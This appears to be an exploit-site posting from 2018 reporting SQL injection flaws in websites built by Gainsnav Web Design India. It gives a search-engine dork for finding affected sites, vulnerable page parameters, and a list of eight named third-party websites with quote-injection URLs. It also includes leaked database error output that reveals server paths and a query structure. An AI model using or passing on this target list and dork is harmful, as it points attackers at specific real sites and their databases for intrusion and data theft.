facebook facebook twitter rss

Design by Gainsnav Web Design India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Design by Gainsnav Web Design India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 26/06/2018
# Vendor Homepage : gainsnav.com
# Google Dork : intext:''Design by Gainsnav''
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# SQL Injection Exploits :

/news.php?id=[SQL Inj]

/content.php?id=[SQL Inj]

/inner_attraction.php?id=[SQL Inj]

/inner.php?id=[SQL Inj]

#################################################################################################

# Example Vulnerable Sites =>

vnscollege.com/news.php?id=15%27 => [ Proof of Concept ] => archive.is/H7OV6

lakepalaceresorts.com/inner_attraction.php?id=4%27

munnarsafariresorts.com/inner.php?id=4%27

valuegrowthsolutions.com/service.php?id=2%27

highrangedairy.com/contents.php?id=5%27

shubhavitravels.in/packages.php?id=29%27

dietpathanamthitta.org/news.php?id=1%27

samstarelectrics.com/inner.php?cid=21%27

# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/vnscollegekonni2/public_html/news.php on line 9

SELECT title,short_descp ,content,meta_title,meta_keywords,meta_desc FROM
tbl_cms WHERE id='21''--
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''21''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :